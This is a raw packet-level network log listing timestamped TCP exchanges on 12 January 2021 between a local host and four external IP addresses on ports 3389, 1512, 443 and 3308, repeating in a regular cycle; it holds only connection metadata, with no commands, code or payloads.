Jan 12, 2021 01:45:42.642587900 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.697010040 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.697278023 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.736901045 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.751332998 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.751399994 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.841823101 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.841936111 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.841979980 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.842046976 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.844024897 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.898417950 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:43.010876894 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.063935995 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.064035892 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.064984083 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.117825031 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.124732018 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.124752045 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.124835014 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.131097078 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.185215950 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.185457945 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.194971085 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.195099115 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.248059034 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.248394012 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.286469936 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.301491022 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.403009892 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.403078079 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.403364897 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.406843901 CET	49356	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:43.459806919 CET	1512	49356	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:43.618411064 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.670763969 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:43.670886040 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.671561003 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.723716974 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:43.740381956 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:43.740458965 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.754033089 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.808571100 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:43.808772087 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.818470001 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.818640947 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.870692015 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:43.870938063 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:43.907130003 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:43.923198938 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:44.041917086 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:44.041973114 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:44.042347908 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:44.412754059 CET	49357	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:44.465133905 CET	443	49357	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:44.555448055 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.598875999 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.599041939 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.600496054 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.643652916 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.654203892 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.654294014 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.654364109 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.654407978 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.660828114 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.706017971 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.706214905 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.716371059 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.716730118 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.759835005 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.760032892 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.803422928 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.918776989 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.918884039 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:44.919091940 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.924868107 CET	49358	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:44.968203068 CET	3308	49358	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:45.046541929 CET	49359	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.100779057 CET	3389	49359	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.100939035 CET	49359	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.109811068 CET	49359	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.163880110 CET	3389	49359	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.189934969 CET	3389	49359	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.189987898 CET	3389	49359	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.190152884 CET	49359	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.203473091 CET	49359	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.268306971 CET	3389	49359	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.268426895 CET	49359	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.269103050 CET	49359	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.271296024 CET	3389	49359	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.271409988 CET	49359	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.271528959 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.322896004 CET	3389	49359	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.325277090 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.325376987 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.326530933 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.379870892 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.406565905 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.406609058 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.406680107 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.407155991 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.412744045 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.474526882 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.474888086 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.484666109 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.484790087 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.539287090 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.539546967 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.579344034 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.593071938 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.593116045 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.687144995 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.687191010 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.687520981 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.687577009 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.693125010 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:45.747550964 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:45.811455965 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:45.864713907 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:45.864931107 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:45.866447926 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:45.919444084 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:45.926297903 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:45.926343918 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:45.926471949 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:45.926548004 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:45.940028906 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:45.994275093 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:45.994663000 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:46.004565954 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:46.004921913 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:46.058146000 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:46.058602095 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:46.094677925 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:46.111816883 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:46.111864090 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:46.213058949 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:46.213109016 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:46.213404894 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:46.218877077 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:46.271971941 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:46.341976881 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.394432068 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.394663095 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.396497965 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.449599028 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.466078043 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.466242075 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.481654882 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.536113977 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.536283016 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.547023058 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.547343969 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.602330923 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.602521896 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.641839981 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.654669046 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.772669077 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.772713900 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.772979975 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.778579950 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:46.831615925 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:46.887444019 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:46.931157112 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:46.931302071 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:46.933006048 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:46.976315975 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:46.988914967 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:46.988953114 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:46.989118099 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:47.006041050 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:47.051629066 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:47.051779032 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:47.062504053 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:47.062871933 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:47.105995893 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:47.106192112 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:47.145833969 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:47.150165081 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:47.150235891 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:47.263407946 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:47.263540983 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:47.263811111 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:47.269465923 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:47.312793970 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:47.386888981 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.441046000 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.441185951 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.442668915 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.497637033 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.527704954 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.527762890 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.527821064 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.527872086 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.540023088 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.599656105 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.599792004 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.607192039 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.607315063 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.661266088 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.661385059 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.701037884 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.718993902 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.719047070 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.809566975 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.809613943 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.809897900 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.815668106 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:47.870090961 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:47.969727993 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.022651911 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.022874117 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.024388075 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.077028036 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.084002018 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.084028006 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.084311962 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.098454952 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.152514935 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.153007984 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.170938015 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.171091080 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.224020004 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.224333048 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.262494087 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.277466059 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.381531954 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.381580114 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.381944895 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.387469053 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:48.440447092 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:48.550976992 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.603506088 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.603636026 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.605065107 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.657361031 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.672018051 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.672167063 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.686764956 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.741436005 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.741728067 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.750951052 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.751188040 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.803580999 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.803883076 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.843230009 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.856319904 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.856375933 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.975321054 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.975367069 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:48.975699902 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:48.981281996 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:49.033725977 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:49.131581068 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.175120115 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.175393105 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.177177906 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.220465899 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.236417055 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.236459970 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.236605883 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.236654043 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.251274109 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.297350883 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.297643900 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.306798935 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.307017088 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.350214005 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.350389004 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.390566111 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.393784046 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.507091999 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.507138968 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.507464886 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.512933969 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:49.556231976 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:49.689019918 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.742959023 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:49.743141890 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.744911909 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.799340010 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:49.820444107 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:49.820492983 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:49.820588112 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.820631981 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.833189011 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.897192001 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:49.897406101 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.905165911 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.905364037 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.959213972 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:49.959335089 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:49.998163939 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:50.013309002 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:50.013350010 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:50.103959084 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:50.104001999 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:50.104111910 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:50.104151964 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:50.109968901 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:50.164429903 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:50.226639032 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.279731989 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.279916048 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.281714916 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.334484100 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.341422081 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.341475010 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.341538906 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.341579914 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.355350018 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.409538031 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.409732103 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.421268940 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.421452999 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.474374056 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.474653959 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.510582924 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.527626991 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.527667999 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.632662058 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.632720947 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.633130074 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.638735056 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:50.691816092 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:50.757028103 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:50.809108973 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:50.809317112 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:50.811319113 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:50.863092899 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:50.877825022 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:50.878082037 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:50.894802094 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:50.949208975 CET	443	49370	77.220.64.37	192.168.2.22
